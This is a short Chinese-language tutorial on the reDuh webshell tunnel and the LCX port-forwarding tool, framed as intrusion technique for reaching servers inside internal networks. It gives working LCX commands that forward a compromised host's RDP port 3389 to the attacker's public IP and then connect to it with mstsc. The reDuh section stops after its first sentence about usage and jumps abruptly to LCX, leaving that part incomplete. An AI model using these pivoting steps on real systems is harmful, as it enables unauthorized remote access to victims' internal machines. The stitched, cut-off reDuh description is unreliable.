reDuh是可以把内网服务器的端口通过http或https隧道转发到本机,形成一个TCP连通回路,用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部端口的工具。
reDuh和LCX类似,都可以将内网端口映射到本机,reDuh和LCX不同的地方就是reDuh不需要本地电脑拥有外网IP,在某些本地内网做了端口策略的环境中LCX就无用武之地了。
reDuh是sensepost网站发布的,reDuh与LCX不同,它包含两个部分,Java版本的本地客户端和webshell服务端,其中服务端针对不同的服务器又分为aspx,php,jsp三个版本。
reDuh的使用方法很简单,首先描述一下使用环境
lcx是一款强大的内网端口转发工具,用于将内网服务器开放的内部端口映射到本地任意端口。
lcx是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。
lcx端口转发相当于把肉鸡A(被控端)上的3389端口或其他需要连接端口转发到B机上(控制端),当然这个B机必须有外网IP,这是lcx唯一不足的地方。
lcx使用说明:
本机: lcx -listen 2222 3333
2222为转发端口,3333为本机任意未被占用的端口
肉鸡:lcx -slave 123.123.123.123 2222 127.0.0.1 3389
123.123.123.123 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口
本地连接肉鸡3389时格式mstsc 127.0.0.1:3333
好了,通过lcx端口映射就可以直接连接内网服务器了
